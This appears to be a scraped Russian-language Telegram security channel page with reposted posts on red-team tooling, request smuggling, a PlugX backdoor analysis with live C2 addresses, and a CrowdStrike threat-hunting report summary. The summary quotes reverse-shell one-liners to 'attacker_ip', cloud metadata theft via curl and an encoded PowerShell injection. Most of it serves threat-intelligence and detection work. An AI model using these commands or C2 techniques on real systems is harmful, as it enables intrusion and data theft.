Fsecurity | HH
Відкрити в Telegram
Канал про ИБ Наш Discord: https://discord.gg/Eg8aDS7Hn7 Пожертвовать: > https://www.donationalerts.com/r/xackapb
Показати більше2 018
Підписники
-224 години
+17 днів
-1430 день
Архів дописів
2 018
Repost from Proxy Bar
Linux-persistence
*
zero pepsi
ждем сок добрый сплоит пак и наступательный чебурек
2 018
Repost from RedTeam brazzers
Друзья, всем привет!
В моей голове давно была хотелка создать некоторую документацию по Impacket. Быть может, даже цикл статей, который бы достаточно понятным языком, с обилием примеров, описывал механизмы работы этого замечательного инструмента.
И у меня наконец-то дошли руки этим заняться! Я выкладываю первую часть из цикла статей про Impacket. В ней мы разберемся с основами RPC, изучим парочку базовых терминов, а также напишем собственный RPC клиент и сервер.
https://cicada-8.medium.com/impacket-developer-guide-part-1-rpc-4df4fe6d79d7
А цикл статей завершится инструментом (а может даже несколькими) для бокового перемещения : )
RTB
2 018
Repost from SHADOW:Group
James Kettle дропнул свой ресерч про новые классы атак через HTTP Request Smuggling и, к моему большому респекту, подкрепил все это доступной лабой на Portswigger. Публичного решения нет, но лаба довольно простая. Теперь можно убивать HTTP/1.1 на реальных целях.
2 018
Repost from 🕷 BugBountyRu
🕷 Повышение эффективности разведки с помощью reverse DNS
В разведке все методы хороши, особенно когда речь идет о больших скоупах. Reverse DNS и анализ SSL-сертификатов — тот самый необходимый минимум.
😵 На помощь приходят как онлайн-сервисы, так и опенсорсные инструменты:
⚙️ hakip2host — принимает список IP-адресов через stdin, а затем выполняет ряд проверок и возвращает соответствующие доменные имена.
▪️Поиск PTR-записей в DNS
▪️Subject Alternative Names (SANs) в SSL-сертификатах
▪️Common Names (CNs) в SSL-сертификатах
⚙️ dnsx — быстрый и многофункциональный тулчейн от ProjectDiscovery для работы с DNS.
$ echo 173.0.84.0/24 | dnsx -silent -resp-only -ptr2 018
Repost from BEAR-C2
Симуляция атаки группы APT Stardust Chollima
Это симуляция атаки группы APT Stardust Chollima, нацеленной на межбанковскую сеть Чили. Кампания атаки была активна в декабре 2018 года и использовала PowerRatankba — вариант вредоносного ПО на базе PowerShell, который во многом схож с оригинальным имплантом Ratankba. Корпоративная сеть Redbanc была заражена версией PowerRatankba, которая не определялась антивирусным программным обеспечением.
По данным компании Flashpoint, злоумышленники доставили вредоносное ПО следующим образом: доверенный IT-специалист Redbanc кликнул по ссылке для подачи заявки на вакансию, найденную в социальной сети LinkedIn.
Репозиторий на GitHub: https://github.com/S3N4T0R-0X0/APT-Attack-Simulation/tree/main/North%20Koreans%20APT%2FStardust%20Chollima
2 018
Repost from Threat Hunting Father 🦔
The Threat Hunter's Cookbook🔥
🍳 Что внутри Cookbook:
🐱 Готовые SPL-запросы — бери как есть или настраивай под себя
🛠 Методологии и стратегии охоты: от выбора техники до построения гипотез
🧰 Рекомендованные приложения, ресурсы и утилиты для прокачки SecOps
🎯 Идеально подойдёт тем, кто уже:
• использует Splunk в охоте
• хочет формализовать поиск по PEAK
• ищет примеры, которые не теоретические, а боевые
🔗 https://www.splunk.com/en_us/form/threat-hunters-cookbook.html
🦔 THF
2 018
Repost from ESCalator
+2
Operation Tartaria Part 2
Помимо пассивного бэкдора
PlugX, нам удалось обнаружить еще одну его версию, которая мимикрировала под запуск Яндекс Браузера.
{"TaskId":"[REDACTED]","TaskName":"Yandexstart_Server","TaskRegistryPath":"\\Yandexstart_Server","TaskAuthor":"[REDACTED]","IsHiddenTask":false,"IsMissingOnFS":true,"Action":{"Context":"Author","Properties":[{"Id":"","ActionName":"Execution","Arguments":"-d restart","Command":"C:\\PROGRA~1\\Yandex\\browser\\Yandex.exe","WorkingDirectory":"","Flags":0}],"Version":3},"Triggers":[{"TriggerType":"Boot","Comment":"Boot"}],"CreatedTime":"2024-12-11T01:11:34Z","LastRunTime":"2025-06-23T06:37:17Z","LastErrorCode":1223,"Timeline":"2024-12-11T01:11:34Z"}
Yandex.exe оказался уязвимым для техники DLL Side-Loading, выполняемой утилитой Umdh.exe (User-Mode Dump Heap), которая подгружает вредоносную библиотеку dbghelp.dll под пакером VMProtect с кастомным названием секций; нагрузка хранится в файле desktop.ini.
🫣 Как и в предыдущем случае, мы имеем дело с двухмодульным бэкдором. Коннектор внедряется в процесс choice.exe, а интерпретатор команд — в mspaint.exe. Процессы общаются через pipe .\\PIPE\\[%d].
При успешном старте исследуемый образец подключается к блогу на livejournal.com (скриншот 1) и на ok.ru (скриншоты 2-3). Далее парсит содержимое ответа и ищет последовательность, которая начинается с R241223 и заканчивается на R251223 и внутри которой находится зашифрованный токен для API Yandex Cloud. Далее коммуникация бэкдора происходит через API. Аналогичный образец был описан в «CloudSorcerer: новая APT-угроза, нацеленная на российские государственные организации».
Помимо Yandex Cloud, бэкдор поддерживает возможность общения через Microsoft Graph и Dropbox:
cloud-api.yandex.net graph.microsoft.com content.dropboxapi.comОбщение происходит посредством чтения и перезаписи файлов в заданной папке в облаке. Сами файлы защищены шифром простой замены, а структура сообщений отличается в зависимости от выполняемой команды. Однако везде используется один и тот же
header:
0 2 6 10 14 | command | msg size | short answer | ticketcount |☝️ Примечательны следующие функции бэкдора: • возможность получать шеллкоды и PE-файлы, внедряя их в процессы
TSTheme.exe и msiexec.exe;
• выполнение WMI-запросов для получения информации о системе:
SELECT * FROM Win32_OperatingSystem
SELECT * FROM Win32_TimeZone
SELECT * FROM Win32_ComputerSystem
SELECT * FROM Win32_QuickFixEngineering
• отключение всех сетевых соединений API WNetCancelConnection2W;
• изменение параметров входа в учетную запись или пароля через API NetUserSetInfo.
C2:
devtunnels.ms https://anddes.livejournal.com/511.html https://ok.ru/profile/587950172233/statuses/157023463517001✅ Рекомендации: • запрет DevTunnels с помощью групповой политики; • поиск скрытых задач; • поиск задач с параметром:
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks" /s | findstr "2D00720065006D006F0074006500200075007000"
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks" /s | findstr "2d00640020007200650073007400610072007400"• поиск идентификатора
PlugX:
reg query HKEY_LOCAL_MACHINE\SOFTWARE\Clients\Mail\cfHappy hunting! @ptescalator #dfir #ti #apt #reverse #malware
2 018
Repost from Social Engineering
🔄 Chrome Exploitation.
• Недавно в блоге Operation Zero (компания которая покупает уязвимости в различном ПО\устройствах) была опубликована хорошая статья, которая описывает архитектуру современных браузеров и их эксплуатации на примере Chrome.
• Вы сможете изучить, как устроены подсистемы браузера, как обеспечивается их безопасность и как она нарушается с помощью уязвимостей, примитивов, обходов защит, эксплоитов и их цепочек. Каждая статья будет практической, поэтому с самого начала авторы кратко анализируют несколько известных эксплоитов, компилируют их благодаря публичному репозиторию и пробивают Chrome 130-й версии для Windows.
• Учитывайте, что на данный момент опубликована только первая часть на английском языке. Позже будет опубликовано продолжение, так что следите за блогом. Ну и еще обещают перевод на русский язык, но это не точно.
➡ https://opzero.ru/press/101-chrome-exploitation-part-0-preface
S.E. ▪️ infosec.work ▪️ VT
2 018
Repost from Threat Hunting Father 🦔
🫥 CrowdStrike 2025 Threat Hunting Report
👾 За год OverWatch обработали 215,000+ интерактивных сессий, в которых не сработали ни сигнатуры, ни ML. Только люди + охота. Все атаки — hands-on-keyboard.
Что подметить из репорта:
🔀 Cross-Domain / Cloud: когда атакуют сразу всё
🕷️ BLOCKADE SPIDER:
• Начал с уязвимого VPN → DCSync → lateral через WinRM / PsExec
• Переходил с endpoint на cloud: bypass MFA, создание rogue IAM agent
• Пробивал Entra ID: добавление в “IAM No MFA”, обход геофильтров
• На unmanaged системах ставил Chisel proxy и устраивал SOCKS-туннели
📌 Зафиксированы попытки помешать Falcon Sensor
🐼 OPERATOR PANDA (Salt Typhoon):
• Эксплуатация Cisco IOS/IOS XE (CVE-2023-20198 + CVE-2023-20273)
• Создание локального пользователя → log sanitization → RCE
• Удар по blind-spot: роутеры, VPN, свитчи, вне зоны действия EDR
☁️ Cloud: GENESIS vs MURKY PANDA
🐼 GENESIS PANDA:
• Pivot из Jenkins в облако через IMDS → добавление SSH-ключей и access key
• Использование CSP CLI и команд:
curl http://IP/latest/meta-data/
aws s3 ls
gcloud compute ssh ...
• Жил в control plane, хостил payload на облачных инстансах
• Использовал .NET тул для возвращения в консоль по backdoor key
🐼 MURKY PANDA:
• Атака через trusted relationship → backdoor в Entra ID сервисные учётки
• Компрометация стороннего Azure-провайдера → логины с NAS/VPS
• Отмечена малварь CloudedHope, удаление логов и резкая OPSEC-дисциплина
🔐 Identity: SCATTERED SPIDER и MFA reset через helpdesk
📞 Социнженерия по телефону (vishing):
• MFA reset → SSO логин → SharePoint → PAM → dump ntds.dit
• Отслежено, как они:
меняют IP на резидентские (NSOCKS)
ищут "reset password" шаблоны
работают ночью, чтобы не быть замеченными
SaaS + Identity + Endpoint = полный доступ без вирусов.
🔍 Поиск по:
DeviceLogonEvents
| where AccountName endswith "@domain.com"
| where Timestamp during non-business-hours
| where LogonType == "RemoteInteractive"
⌨️ Endpoint: тихие APT и живые бэкдоры
🐼 GLACIAL PANDA:
• Угроза телеком-сектора на Linux, скрытая и долгая
• Эксплуатация CVE-2016-5195 (Dirty COW) + CVE-2021-4034 (PwnKit)
• ShieldSlide: троянизированный OpenSSH (/usr/sbin/sshd) с логами auth + backdoor-пароль
• Примеры артефактов:
/usr/sbin/cron → изменённый daemon
perl -e 'use Socket; ...' → reverse shell
netcat -e /bin/bash attacker_ip
• LOTL-движение, атаки между дочками компаний
🔍 Охота через:
sha256sum /usr/sbin/sshd | grep -v known_good
ps aux | grep cron | grep -v /usr/sbin/cron
🕳 Vulnerability Hunting:
🕷 GRACEFUL SPIDER:
• Zero-Day в Cleo MFT (CVE-2024-55956) → bypass старого фикса CVE-2024-50623
• Этапы:
Загрузка .zip → C:\VLTrader\temp\
В распаковке XML с параметром выполнения команды
Внедрение shellcode → запуск пиратского Cobalt Strike
• Использовал:
<Mailbox type="system" command="powershell -enc ..." />
Falcon Sensor + OverWatch охота по:
#event_simpleName=PeFileWritten
ContextBaseFileName=java.exe
TargetFileName!=/<known_good_files>/
⚔️ Threat hunting требует выхода за границы одного домена. Только корреляция данных Identity + Cloud + Endpoint + Exposure позволяет отследить такие группировки, как BLOCKADE, OPERATOR, SCATTERED и PANDA-акторов.
☁️ Cloud = новая активная зона APT
🧬 Identity = entry + escalation
💣 Endpoint = persistence + эксфиль
🐱 SIEM и XDR = must have, чтобы не видеть только “что”, но и “почему”
🦔 THF
Вже доступно! Дослідження Telegram за 2025 — головні інсайти року 
